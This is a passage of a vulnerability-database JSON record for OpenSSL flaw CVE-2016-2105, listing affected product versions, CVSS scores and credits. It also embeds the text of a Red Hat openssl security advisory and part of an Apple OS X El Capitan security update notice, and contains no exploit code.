"cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.2", "versionStartIncluding": "4.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:6.0.0:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.11.1", "versionStartIncluding": "5.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.12.14", "versionStartIncluding": "0.12.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.10.45", "versionStartIncluding": "0.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "4.4.4", "versionStartIncluding": "4.2.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2105" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Guido Vranken", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-081" } ], "trust": 0.6 }, "cve": "CVE-2016-2105", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2105", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-90924", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2105", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2105", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201605-081", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-90924", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-90924" }, { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "CNNVD", "id": "CNNVD-201605-081" }, { "db": "NVD", "id": "CVE-2016-2105" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data. OpenSSL is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer.. \nAttackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. \nFollowing product versions are affected:\nOpenSSL versions 1.0.2 prior to 1.0.2h\nOpenSSL versions 1.0.1 prior to 1.0.1t. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:0996-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0996.html\nIssue date: 2016-05-10\nCVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 \n CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 \n CVE-2016-2842 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. An attacker could use this flaw to create a specially crafted\ncertificate which, when verified or re-encoded by OpenSSL, could cause it\nto crash, or execute arbitrary code using the permissions of the user\nrunning an application compiled against the OpenSSL library. \n(CVE-2016-2105, CVE-2016-2106)\n\n* It was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when the connection used the\nAES CBC cipher suite and the server supported AES-NI. A remote attacker\ncould possibly use this flaw to retrieve plain text from encrypted packets\nby using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)\n\n* Several flaws were found in the way BIO_*printf functions were\nimplemented in OpenSSL. Applications which passed large amounts of\nuntrusted data through these functions could crash or potentially execute\ncode with the permissions of the user running such an application. \n(CVE-2016-0799, CVE-2016-2842)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107,\nand CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat),\nHanno B\u00f6ck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842,\nCVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as\nthe original reporter of CVE-2016-2107. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz\n6dbI0EemYRoHCDagPHSycq4=\n=g2Zb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the following:\n\napache_mod_php\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to view sensitive user information\nDescription: A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to elevate privileges\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription: User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A use-after-free was addressed through improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An application may be able to execute arbitrary code with\nroot privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxml2\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a denial of service\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to gain root privileges\nDescription: A type confusion issue was addressed through 